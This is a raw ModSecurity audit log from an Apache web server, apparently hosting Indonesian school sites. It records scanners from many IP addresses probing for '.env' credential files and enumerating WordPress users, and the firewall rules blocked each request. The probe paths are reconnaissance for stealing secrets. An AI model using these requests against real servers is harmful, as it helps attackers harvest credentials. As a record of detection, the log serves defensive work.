Action: Intercepted (phase 1) Stopwatch: 1749366541902073 948 (- - -) Stopwatch2: 1749366541902073 948; combined=380, p1=325, p2=0, p3=0, p4=0, p5=55, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c43a6849-Z-- --c30e3901-A-- [08/Jun/2025:15:31:22 +0700] aEVKWse0OZpePEzoRnpTFQAAAEw 103.236.140.4 50272 103.236.140.4 8181 --c30e3901-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G930V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c30e3901-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c30e3901-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749371482967094 848 (- - -) Stopwatch2: 1749371482967094 848; combined=357, p1=317, p2=0, p3=0, p4=0, p5=40, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c30e3901-Z-- --64651f7e-A-- [08/Jun/2025:16:34:39 +0700] aEVZL8e0OZpePEzoRnpTiQAAAE8 103.236.140.4 50808 103.236.140.4 8181 --64651f7e-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 31.56.56.150 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 31.56.56.150 Accept-Encoding: gzip X-Varnish: 174643002 --64651f7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --64651f7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749375279713044 927 (- - -) Stopwatch2: 1749375279713044 927; combined=354, p1=315, p2=0, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64651f7e-Z-- --5874ed4b-A-- [08/Jun/2025:16:39:49 +0700] aEVaZYsoVckF-yt1MVzVoQAAANI 103.236.140.4 50870 103.236.140.4 8181 --5874ed4b-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.226.78.121 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.226.78.121 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --5874ed4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5874ed4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749375589287190 794 (- - -) Stopwatch2: 1749375589287190 794; combined=338, p1=303, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5874ed4b-Z-- --e62bc334-A-- [08/Jun/2025:16:42:20 +0700] aEVa_MCyjFxjzV1Pwa01XQAAAAc 103.236.140.4 50926 103.236.140.4 8181 --e62bc334-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8 Accept-Charset: utf-8 --e62bc334-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e62bc334-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749375740615000 876 (- - -) Stopwatch2: 1749375740615000 876; combined=342, p1=302, p2=0, p3=0, p4=0, p5=40, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e62bc334-Z-- --91aa7f21-A-- [08/Jun/2025:16:53:51 +0700] aEVdr8e0OZpePEzoRnpTkQAAAEs 103.236.140.4 51090 103.236.140.4 8181 --91aa7f21-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 Accept-Charset: utf-8 --91aa7f21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91aa7f21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749376431358322 862 (- - -) Stopwatch2: 1749376431358322 862; combined=327, p1=288, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91aa7f21-Z-- --c996051b-A-- [08/Jun/2025:17:01:06 +0700] aEVfYsCyjFxjzV1Pwa01YwAAAAY 103.236.140.4 51122 103.236.140.4 8181 --c996051b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.31 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.31 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c996051b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c996051b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749376866610789 779 (- - -) Stopwatch2: 1749376866610789 779; combined=321, p1=284, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c996051b-Z-- --1e86b926-A-- [08/Jun/2025:17:03:19 +0700] aEVf54soVckF-yt1MVzV2gAAAME 103.236.140.4 51182 103.236.140.4 8181 --1e86b926-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 164.92.244.132 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1e86b926-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e86b926-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749376999837676 801 (- - -) Stopwatch2: 1749376999837676 801; combined=288, p1=254, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e86b926-Z-- --884d4013-A-- [08/Jun/2025:17:13:33 +0700] aEViTce0OZpePEzoRnpUFwAAAFA 103.236.140.4 54850 103.236.140.4 8181 --884d4013-B-- GET /sites/all/libraries/mailchimp/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174 Accept-Charset: utf-8 --884d4013-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --884d4013-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749377613877555 592 (- - -) Stopwatch2: 1749377613877555 592; combined=248, p1=223, p2=0, p3=0, p4=0, p5=24, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --884d4013-Z-- --2a97dc3e-A-- [08/Jun/2025:17:16:37 +0700] aEVjBaD1_iznf-QmBECUiAAAAIk 103.236.140.4 57670 103.236.140.4 8181 --2a97dc3e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 Accept-Charset: utf-8 --2a97dc3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a97dc3e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749377797615129 774 (- - -) Stopwatch2: 1749377797615129 774; combined=335, p1=296, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a97dc3e-Z-- --e9614c4e-A-- [08/Jun/2025:17:50:20 +0700] aEVq7MCyjFxjzV1Pwa03dgAAAAE 103.236.140.4 58904 103.236.140.4 8181 --e9614c4e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Safari/537.36 Accept-Charset: utf-8 --e9614c4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9614c4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749379820346387 755 (- - -) Stopwatch2: 1749379820346387 755; combined=320, p1=278, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9614c4e-Z-- --2719fa1c-A-- [08/Jun/2025:17:54:11 +0700] aEVr08CyjFxjzV1Pwa03eQAAAAo 103.236.140.4 58964 103.236.140.4 8181 --2719fa1c-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 109.87.213.146 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 109.87.213.146 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --2719fa1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2719fa1c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749380051436836 947 (- - -) Stopwatch2: 1749380051436836 947; combined=539, p1=245, p2=0, p3=0, p4=0, p5=294, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2719fa1c-Z-- --7a1bcc6c-A-- [08/Jun/2025:19:14:45 +0700] aEV-tce0OZpePEzoRnpVbAAAAEo 103.236.140.4 59708 103.236.140.4 8181 --7a1bcc6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 49.0.80.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 49.0.80.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7a1bcc6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a1bcc6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749384885429790 3486 (- - -) Stopwatch2: 1749384885429790 3486; combined=1499, p1=484, p2=974, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a1bcc6c-Z-- --5c025a7a-A-- [08/Jun/2025:19:41:28 +0700] aEWE-KD1_iznf-QmBECVHwAAAI4 103.236.140.4 59894 103.236.140.4 8181 --5c025a7a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 14.225.2.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 14.225.2.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/80.0.262003652 Mobile/16G77 Safari/604.1 Accept-Charset: utf-8 --5c025a7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c025a7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749386488035082 786 (- - -) Stopwatch2: 1749386488035082 786; combined=339, p1=303, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c025a7a-Z-- --5cb7d571-A-- [08/Jun/2025:19:42:12 +0700] aEWFJKD1_iznf-QmBECVIgAAAIc 103.236.140.4 59904 103.236.140.4 8181 --5cb7d571-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 14.225.2.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 14.225.2.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 --5cb7d571-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cb7d571-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749386532835319 765 (- - -) Stopwatch2: 1749386532835319 765; combined=310, p1=275, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cb7d571-Z-- --a928750c-A-- [08/Jun/2025:19:45:13 +0700] aEWF2YsoVckF-yt1MVzZTwAAAMw 103.236.140.4 59940 103.236.140.4 8181 --a928750c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 14.225.2.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 14.225.2.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 YaBrowser/19.7.2.516 Yowser/2.5 Safari/537.36 Accept-Charset: utf-8 --a928750c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a928750c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749386713454173 844 (- - -) Stopwatch2: 1749386713454173 844; combined=354, p1=311, p2=0, p3=0, p4=0, p5=42, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a928750c-Z-- --4080e83f-A-- [08/Jun/2025:19:52:12 +0700] aEWHfMCyjFxjzV1Pwa033wAAAAY 103.236.140.4 60104 103.236.140.4 8181 --4080e83f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 88.81.94.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 88.81.94.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4080e83f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4080e83f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749387132488988 3163 (- - -) Stopwatch2: 1749387132488988 3163; combined=1412, p1=474, p2=906, p3=0, p4=0, p5=31, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4080e83f-Z-- --3530665e-A-- [08/Jun/2025:20:09:22 +0700] aEWLgosoVckF-yt1MVzZcQAAAMg 103.236.140.4 60254 103.236.140.4 8181 --3530665e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.251.67.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.251.67.143 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --3530665e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3530665e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749388162706893 891 (- - -) Stopwatch2: 1749388162706893 891; combined=365, p1=328, p2=0, p3=0, p4=0, p5=36, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3530665e-Z-- --c9813818-A-- [08/Jun/2025:20:09:22 +0700] aEWLgsCyjFxjzV1Pwa037QAAABg 103.236.140.4 60256 103.236.140.4 8181 --c9813818-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 196.251.67.143 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 196.251.67.143 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --c9813818-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9813818-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749388162741012 919 (- - -) Stopwatch2: 1749388162741012 919; combined=344, p1=301, p2=0, p3=0, p4=0, p5=42, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9813818-Z-- --11cc552f-A-- [08/Jun/2025:20:16:14 +0700] aEWNHse0OZpePEzoRnpVqQAAAEE 103.236.140.4 60372 103.236.140.4 8181 --11cc552f-B-- GET /dashboard/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-A730F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --11cc552f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11cc552f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749388574050499 839 (- - -) Stopwatch2: 1749388574050499 839; combined=337, p1=296, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11cc552f-Z-- --5f1b0531-A-- [08/Jun/2025:20:37:48 +0700] aEWSLMe0OZpePEzoRnpWUAAAAEw 103.236.140.4 35516 103.236.140.4 8181 --5f1b0531-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id 